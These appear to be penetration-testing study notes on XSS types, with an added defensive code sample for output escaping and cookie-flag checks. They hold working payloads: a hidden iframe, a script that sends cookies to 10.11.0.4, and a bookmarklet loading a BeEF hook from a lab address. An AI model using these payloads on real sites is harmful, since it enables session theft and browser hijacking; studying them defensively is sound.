XSS
Reflected XSS
The script is reflected back from the current HTTP request
Stored XSS
The script is stored in the website's database
DOM-Based
The vulnerability exists in client-side code rather than on the server itself
https://riptutorial.com/php/example/11883/cross-site-scripting--xss-
Reflected XSS
Generic Test:
<script>alert(1)</script>
Example:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?>'"><script>alert('Hello')</script>
Content Injection:
<iframe src=http://10.11.0.4/report height="0" width="0"></iframe>
Cookie Stealing:
<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>
Will need to wait for the user to log in in order to receive it.
Once received, the cookie value can be replaced in the browser either in the dev tools or with a cookie editor extension.
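Defender-side view of the reflected XSS and cookie-stealing notes above, as an added example that is not part of the original notes: the same unescaped-concatenation sink rendered once without and once with output encoding, and a check that a session cookie carries the HttpOnly flag (which keeps it out of document.cookie). Function names and the sample cookie values are constructed for illustration.

```javascript
// Added example (not from the original notes). Names and sample values are constructed.

// Escape the five characters that let user input break out of an HTML text node
// or a double-quoted attribute value; equivalent to PHP's htmlspecialchars()
// with ENT_QUOTES.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable sink: the request parameter is concatenated straight into the HTML
// body, which is the pattern the "Generic Test" payload in the notes triggers.
function renderUnsafe(name) {
  return `<p>Hello ${name}</p>`;
}

// Hardened sink: every untrusted value passes through escapeHtml() before it
// reaches HTML, so the payload is shown as text instead of executed.
function renderSafe(name) {
  return `<p>Hello ${escapeHtml(name)}</p>`;
}

// Detection helper: true when a live <script> tag survived rendering.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Cookie hygiene check on a Set-Cookie header value. HttpOnly blocks
// document.cookie reads; Secure and SameSite limit where the cookie is sent.
// Returns the flags that are missing (lower-cased).
function missingCookieFlags(setCookieHeader) {
  const attrs = setCookieHeader
    .split(';')
    .slice(1) // drop the name=value pair
    .map((a) => a.trim().toLowerCase());
  const want = ['httponly', 'secure', 'samesite'];
  return want.filter((f) => !attrs.some((a) => a === f || a.startsWith(f + '=')));
}

// Constructed sample input: the generic test payload from the notes.
const payload = '<script>alert(1)</script>';

console.log(renderUnsafe(payload)); // payload survives as live markup
console.log(renderSafe(payload));   // rendered as inert text
console.log(missingCookieFlags('session=abc123; Path=/'));                         // [ 'httponly', 'secure', 'samesite' ]
console.log(missingCookieFlags('session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax')); // []
```

The escaping is context-specific: escapeHtml() is correct for HTML body and quoted attribute values, but a value placed inside a script block, a URL, or an event handler attribute needs the encoding for that context instead.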
Inject JS
javascript:%20(function%20()%20{%20var%20url%20=%20%27http://192.168.119.212:3000/hook.js%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();